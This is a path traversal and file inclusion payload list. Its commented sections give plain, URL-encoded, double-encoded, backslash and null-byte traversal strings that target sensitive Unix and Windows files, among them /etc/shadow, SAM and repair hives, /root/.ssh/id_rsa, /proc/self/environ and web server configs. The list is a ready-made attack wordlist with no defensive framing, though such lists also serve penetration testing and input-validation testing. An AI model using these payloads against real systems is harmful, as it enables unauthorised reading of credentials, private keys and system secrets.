# Basic path traversal payloads
../../../../../../etc/passwd
../../../../../../../etc/passwd
../../../../../../../../etc/passwd
../../../../../etc/passwd
../../../../etc/passwd
../../../../../boot.ini
../../../../boot.ini
../../../../../../boot.ini
../../../../../../etc/shadow
../../../../etc/shadow
../../../../../etc/shadow
../../../../../etc/group
../../../../etc/group
../../../etc/passwd
../../../etc/hosts
../../../../../../etc/hosts
../../../../../etc/hosts
../../../etc/group
./etc/passwd
../etc/passwd
../etc/shadow
../etc/hosts
./etc/hosts
/etc/passwd
/etc/shadow
/etc/hosts
/etc/group
/etc/issue
/boot.ini

# Encoded traversal payloads
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd
%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
%2E%2E%2F%2E%2E%2Fetc%2Fpasswd
..%252f..%252f..%252fetc%252fpasswd
..%5c..%5c..%5cetc%5cpasswd
%2E%2E%5C%2E%2E%5C%2E%2E%5Cetc%5Cpasswd
..%5C..%5C..%5C..%5C..%5C..%5Cetc%5Cpasswd
..%5C..%5C..%5C..%5C..%5Cboot.ini
..%252fetc%252fpasswd
%2e%2e%2f%2e%2e%2fetc%2fpasswd

# URL-encoded traversal payloads
..%2f..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2fboot.ini
..%2f..%2f..%2fetc%2fpasswd
..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f..%252f..%252fetc%252fpasswd
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd

# Windows Path Traversal
..\..\..\..\..\Windows\System32\config\SAM
..\..\..\..\..\boot.ini
..\..\..\..\..\windows\win.ini
..\..\..\..\windows\win.ini
%2E%2E\%2E%2E\%2E%2E\%2E%2E\Windows\System32\config\SAM
%2E%2E\%2E%2E\%2E%2E\%2E%2E\boot.ini

# Path traversal attempts with null bytes (for bypassing filters)
../../../../../../etc/passwd%00
../../../../../etc/passwd%00
../../../../boot.ini%00
../../../../etc/shadow%00
%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2Fetc%2Fpasswd%00
%252e%252e%252f%252e%252e%252f%252e%252e%252fetc%252fpasswd%00
..%00%2f..%00%2f..%00%2fetc%2fpasswd
..%00%5c..%00%5c..%00%5cetc%5cpasswd

# Other sensitive files and directories for traversal
../../../../../var/log/auth.log
../../../../../var/www/html/config.php
../../../../../opt/lampp/htdocs/config.php
../../../../../home/username/.bash_history
../../../../../root/.ssh/id_rsa
../../../../../proc/self/environ
../../../../../proc/self/cmdline
../../../../../proc/version
../../../../../proc/mounts
../../../../../var/log/syslog
../../../../../usr/local/apache2/conf/httpd.conf
../../../../../apache/logs/access.log
../../../../../etc/nginx/nginx.conf
../../../../../etc/mysql/my.cnf
../../../../../usr/share/nginx/html/.htaccess
../../../../../etc/sudoers
../../../../../home/username/.ssh/authorized_keys

# Windows sensitive files for traversal
..\..\..\..\..\boot.ini
..\..\..\..\..\autoexec.bat
..\..\..\..\..\windows\system.ini
..\..\..\..\..\windows\repair\SAM
..\..\..\..\..\windows\repair\SYSTEM
..\..\..\..\..\windows\repair\SECURITY
..\..\..\..\..\windows\repair\SOFTWARE
..\..\..\..\..\windows\repair\DEFAULT
..\..\..\..\windows\win.ini
..\..\..\..\windows\system.ini
..\..\..\..\windows\repair\SAM
..\..\..\windows\system.ini
..\..\windows\system32\config\SAM

# Alternative traversal methods (file inclusion vulnerabilities)
../../../../../../etc/passwd/
../../../../../../../../../../etc/passwd/
../../../../../../../../../../../etc/passwd/
../../../../../../../proc/self/environ
../../../../../../../etc/resolv.conf
../../../../../../../etc/nsswitch.conf
../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../usr/local/apache/logs/error_log

